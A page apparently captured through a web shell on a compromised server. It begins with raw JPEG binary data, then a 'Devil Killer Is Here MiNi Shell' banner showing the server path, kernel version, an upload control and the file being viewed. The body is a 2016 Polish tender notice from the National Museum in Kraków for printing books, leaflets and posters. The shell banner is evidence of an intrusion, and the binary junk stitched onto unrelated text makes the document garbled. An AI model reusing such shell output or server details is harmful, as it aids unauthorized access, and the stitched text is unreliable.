JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160511/118534-N-2016.html

<p class="kh_header"><b>Kraków: Druk offsetowy (wraz z papierem i oprawą) wydawnictw dla potrzeb Muzeum Narodowego w Krakowie w okresie czerwiec - sierpień 2016 w dwóch zadaniach:- zadanie nr 1 -  druk offsetowy wydawnictw książkowych,- zadanie nr 2 -  druk offsetowy wydawnictw drobnych</b><br>
<b>Numer ogłoszenia: 118534 - 2016; data zamieszczenia: 11.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Krakowie , Al. 3-go Maja 1, 30-062 Kraków, woj. małopolskie, tel. 12 43 35 621, faks 12 43 35 555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk offsetowy (wraz z papierem i oprawą) wydawnictw dla potrzeb Muzeum Narodowego w Krakowie w okresie czerwiec - sierpień 2016 w dwóch zadaniach:- zadanie nr 1 -  druk offsetowy wydawnictw książkowych,- zadanie nr 2 -  druk offsetowy wydawnictw drobnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Druk offsetowy (wraz z papierem i oprawą) wydawnictw dla potrzeb Muzeum Narodowego 
w Krakowie w okresie czerwiec - sierpień 2016 w dwóch zadaniach:- zadanie nr 1 -  druk offsetowy wydawnictw książkowych,
- zadanie nr 2 -  druk offsetowy wydawnictw drobnych.
ZADANIE NR 1 
Przedmiotem zamówienia jest druk offsetowy następujących wydawnictw książkowych (wszystkie wydawnictwa wskazane poniżej mają numer ISBN):1.PAŁAC PREZYDENCKI,2.INFORMATOR MNK DLA NAUCZYCIELI,3.KATALOG DO WYSTAWY MARIA. MATER MISERICORDIAE (WERSJA POLSKO-ANGIELSKA),4.PRZEWODNIK EDUKACYJNY DO WYSTAWY MARIA. MATER MISERICORDIAE (WERSJA POLSKA),5.PRZEWODNIK EDUKACYJNY DO WYSTAWY MARIA. MATER MISERICORDIAE (WERSJA ANGIELSKA),6.OFERTA DLA MECENASA,7.BROSZURKA DO WYSTAWY MADONNA W GIRLANDZIE KWIATOWEJ,8.BROSZURKA DO WYSTAWY PAPIESKI SPLENDOR,9.BROSZURKA.

ZADANIE NR 2.Przedmiotem zamówienia jest druk offsetowy następujących wydawnictw drobnych:
I. WYDAWNICTWA DO WYSTAW:1.DRUKI DO WYSTAWY MADONNA W GIRLANDZIE KWIATOWEJ:A.ULOTKA, B.PLAKAT,C.KARTKA POCZTOWA (REPRODUKCJA),2.DRUKI DO WYSTAWY MARIA. MATER MISERICORDIAE:A.KARTKA POCZTOWA,B.MAPKA (WERSJA POLSKA),C.MAPKA (WERSJA ANGIELSKA),3.DRUKI DO WYSTAWY NIECH ŻYJE SZTUKA. KOLEKCJA FELIKSA JASIEŃSKIEGO:A.ULOTKA SKŁADANA.II. WYDAWNICTWA PROMOCYJNE:1.PLAKAT,2.AFISZ ATMA,3.PLAKAT ARSENAŁ,4.ULOTKA SKŁADANA SUKIENNICE(WERSJA POLSKA),5.ULOTKA SUKIENNICE,6.ULOTKA SKŁADANA O/MEHOFFER,7.ULOTKA SKŁADANA EUROPEUM,8.ULOTKA ARSENAŁ,9.ULOTKA SKŁADANA Z MAPKĄ,10.ULOTKA SKŁADANA.III.DRUKI EDUKACYJNE:1. ULOTKA SKŁADANA EDUKACYJNA.IV. DRUKI FIRMOWE:1.KOPERTY FIRMOWE C5,2.KOPERTY FIRMOWE C4,3.KOPERTY FIRMOWE DL,4.PAPIER FIRMOWY (I WZÓR).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.12.00.00-7, 22.10.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie zdecydował się pobierać wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawcy składają oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania przetargowego zostaną dopuszczeni Wykonawcy spełniający warunki udziału w postępowaniu dotyczące posiadania wiedzy i doświadczenia tj.: DLA ZADANIA 1: wykonali należycie w okresie ostatnich trzech lat przed upływem terminu  składania ofert 
(a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej dwa zamówienia polegające na druku  książki (minimum 60-stronicowej)  z barwnymi ilustracjami; 

W celu wykazania spełnienia warunku udziału w postępowaniu, Wykonawca jest zobowiązany dostarczyć wykaz (załącznik nr 5 specyfikacji istotnych warunków zamówienia) wykonanych a w przypadku świadczeń okresowych lub ciągłych wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) głównych dostaw tj. co najmniej dwóch zamówień polegających na druku  książki (minimum  60-stronicowej)  z barwnymi ilustracjami wraz z dowodami, że zamówienie to zostało wykonane należycie o których mowa w par. 1 ust.2 pkt 1 albo 3 Rozporządzenia Prezesa  Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzaju  dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane   (Dz.U. 2013, poz.231); 


W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie (co oznacza że spełnienie warunku udziału w postępowaniu przez jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego jest spełnieniem warunku udziału w postępowaniu). W przypadku gdy zamawiający jest podmiotem, na rzecz którego zamówienie wskazane w wykazie usług, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest: - udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Dokumentacja niniejszego postępowania zawiera wzór takiego zobowiązania (załącznik 8). Podmiot, który zobowiązał się do udostępnienia zasobów na wskazanych zasadach, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Ponadto, jeżeli wykonawca wykazując spełniania warunków udziału w postępowaniu, polega na zasobach innych podmiotów na zasadach wskazanych powyżej, a podmioty te będą brały udział w realizacji części zamówienia, wykonawca przedstawia w odniesieniu do tych podmiotów dokumenty: - aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; - oświadczenie o braku podstaw do wykluczenia - wg wzoru - załącznik 3a specyfikacji. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia. 



DLA ZADANIA 2:wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej dwa  zamówienia polegające na wykonaniu następujących druków ulotnych: plakat, ulotka.Wykonawca w celu wykazania spełnienia ww. warunku udziału w postępowaniu  może wykazać  realizacje druków ulotnych w ramach  łącznych zamówień lub oddzielnie dla każdego druku. 

W celu wykazania spełnienia warunku udziału w postępowaniu, Wykonawca jest zobowiązany dostarczyć wykaz (załącznik nr 6 specyfikacji istotnych warunków zamówienia) wykonanych a w przypadku świadczeń okresowych lub ciągłych wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) głównych dostaw tj. co najmniej dwóch zamówień polegających na wykonaniu następujących druków ulotnych: plakat, ulotka wraz z dowodami, że zamówienie to  zostało wykonane należycie o których mowa w par. 1 ust.2 pkt 1 albo 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzaju  dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013, poz.231);

W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie (co oznacza że spełnienie warunku udziału w postępowaniu przez jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego jest spełnieniem warunku udziału w postępowaniu). W przypadku gdy zamawiający jest podmiotem, na rzecz którego zamówienie wskazane w wykazie usług, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest: - udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Dokumentacja niniejszego postępowania zawiera wzór takiego zobowiązania (załącznik 8). Podmiot, który zobowiązał się do udostępnienia zasobów na wskazanych zasadach, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Ponadto, jeżeli wykonawca wykazując spełniania warunków udziału w postępowaniu, polega na zasobach innych podmiotów na zasadach wskazanych powyżej, a podmioty te będą brały udział w realizacji części zamówienia, wykonawca przedstawia w odniesieniu do tych podmiotów dokumenty: - aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; - oświadczenie o braku podstaw do wykluczenia - wg wzoru - załącznik 3a specyfikacji. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawcy składają oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawcy składają oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawcy składają oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje i zastrzega sobie wprowadzenie zmiany w treści umowy w zakresie:


1)wszelkich terminów określonych umową i jej załącznikami, z wyłączeniem przyczyn niedotrzymania  terminu realizacji umowy z winy Wykonawcy;
Warunki wprowadzenia zmiany: 
- zmiany  w zakresie terminów określonych umową mogą zostać wprowadzone o ile konieczność ich wprowadzenia nie wynika z winy Wykonawcy. Zmiany terminu nie powodują zmiany wynagrodzenia wykonawcy. Zmianę w umowie może inicjować zamawiający jak i wykonawca. Wykonawca inicjuje zmianę umowy poprzez złożenie wniosku zawierającego opis wpływu zmiany na wykonanie zamówienia, termin wprowadzenia zmiany oraz określenie znaczenia zmiany dla realizacji umowy. Wniosek składany jest przez upoważnionego przedstawiciela Wykonawcy, podlega zatwierdzeniu przez Zamawiającego i jest podstawą do przygotowania przez Zamawiającego aneksu do umowy. Po stronie Zamawiającego wniosek o zmianę może zgłosić osoba wskazana w umowie do nadzoru nad jej realizacją. Wniosek taki jest podstawą do przygotowania aneksu. 
2)sposobu realizacji zamówienia (w zakresie warunków płatności, odbioru i dostawy), o ile wpływa on pozytywnie na realizację umowy dla obydwu stron;
Warunki wprowadzenia zmiany:
- zmiany w zakresie sposobu realizacji zamówienia są dopuszczalne o ile wpływają one pozytywnie na realizację umowy dla obydwu stron. Zmiany ww. nie mogą powodować zmiany wynagrodzenia wykonawcy. Zmianę w umowie może inicjować zamawiający jak i wykonawca. Wykonawca inicjuje zmianę umowy poprzez złożenie wniosku zawierającego opis wpływu zmiany na wykonanie zamówienia, termin wprowadzenia zmiany oraz określenie znaczenia zmiany dla realizacji umowy. Wniosek składany jest przez upoważnionego przedstawiciela Wykonawcy, podlega zatwierdzeniu przez Zamawiającego i jest podstawą do przygotowania przez Zamawiającego aneksu do umowy. Po stronie Zamawiającego wniosek o zmianę może zgłosić osoba wskazana w umowie do nadzoru nad jej realizacją. Wniosek taki jest podstawą do przygotowania aneksu.

3)ceny brutto oraz wysokości naliczonego podatku od towarów i usług w przypadku zmiany ustawowej stawki podatku VAT (cena netto nie ulega zmianie);
Warunki wprowadzenia zmiany:
- zmiana ceny brutto jest dopuszczalna w przypadku zmiany ustawowej stawki podatku VAT (jeśli dotyczy) - cena netto nie podlega zmianie. Zmianę w umowie może inicjować zamawiający jak i wykonawca. Wykonawca inicjuje zmianę umowy poprzez złożenie wniosku zawierającego opis wpływu zmiany na wykonanie zamówienia, termin wprowadzenia zmiany oraz określenie znaczenia zmiany dla realizacji umowy. Wniosek składany jest przez upoważnionego przedstawiciela Wykonawcy, podlega zatwierdzeniu przez Zamawiającego i jest podstawą do przygotowania przez Zamawiającego aneksu do umowy. Po stronie Zamawiającego wniosek o zmianę może zgłosić osoba wskazana w umowie do nadzoru nad jej realizacją. Wniosek taki jest podstawą do przygotowania aneksu.
4)nakładu wydawnictw określonego w umowie.  Zmiana nakładu+/- 10% nie powoduje zmiany wynagrodzenia, w przypadku większych zmian nakładu Wykonawca przedstawi Zamawiającemu kalkulację ceny związaną ze zmiana nakładów.
Warunki wprowadzenia zmiany:
- zmiany w zakresie zamówienia są dopuszczalne o ile wpływają one pozytywnie na realizację umowy dla obydwu stron. Zmianę w umowie może inicjować zamawiający jak i wykonawca. Wykonawca inicjuje zmianę umowy poprzez złożenie wniosku zawierającego opis wpływu zmiany na wykonanie zamówienia, termin wprowadzenia zmiany, rekalkulację wynagrodzenia (jeśli wymagana) oraz określenie znaczenia zmiany dla realizacji umowy. Wniosek składany jest przez upoważnionego przedstawiciela Wykonawcy, podlega zatwierdzeniu przez Zamawiającego i jest podstawą do przygotowania przez Zamawiającego aneksu do umowy. Po stronie Zamawiającego wniosek o zmianę może zgłosić osoba wskazana w umowie do nadzoru nad jej realizacją. Wniosek taki jest podstawą do przygotowania aneksu. Wykonawca na wniosek Zamawiającego powinien przedstawić niezwłocznie stosowną rekalkulację(jeśli jest wymagana) w sposób umożliwiający zawarcie aneksu. Jej nieprzedstawienie oznaczać będzie wyrażenie zgody na przyjęcie kalkulacji Zamawiającego.
5)ilości druku. Zamawiający  w uzasadnionych przypadkach zastrzega sobie prawo odstąpienia do zlecenia druku wybranych wydawnictw w całości lub części. 
Warunki wprowadzenia zmiany:
- zmianę w umowie może inicjować zamawiający. Wniosek o zmianę może zgłosić osoba wskazana w umowie do nadzoru nad jej realizacją na co najmniej 5 dni przed terminem dostarczenia druków. Wniosek taki jest podstawą do przygotowania aneksu.  Wykonawcy z tytułu wprowadzenia ww. zmiany przysługuje jedynie wynagrodzenie z tytułu wykonanych druków.
6)rodzaju papieru lub innych surowców użytych do produkcji danego druku - książki bądź druku drobnego (na wniosek Zamawiającego). W takim przypadku Wykonawca przedstawi Zamawiającemu kalkulację ceny związanej ze zmianą papieru lub innych surowców.
Warunki wprowadzenia zmiany:
- zmianę w umowie może inicjować zamawiający. Wniosek o zmianę może zgłosić osoba wskazana w umowie do nadzoru nad jej realizacją. Wniosek taki jest podstawą do przygotowania aneksu. Wykonawca na wniosek Zamawiającego powinien przedstawić niezwłocznie stosowną rekalkulację w sposób umożliwiający zawarcie aneksu. Jej nieprzedstawienie oznaczać będzie wyrażenie zgody na przyjęcie kalkulacji Zamawiającego.
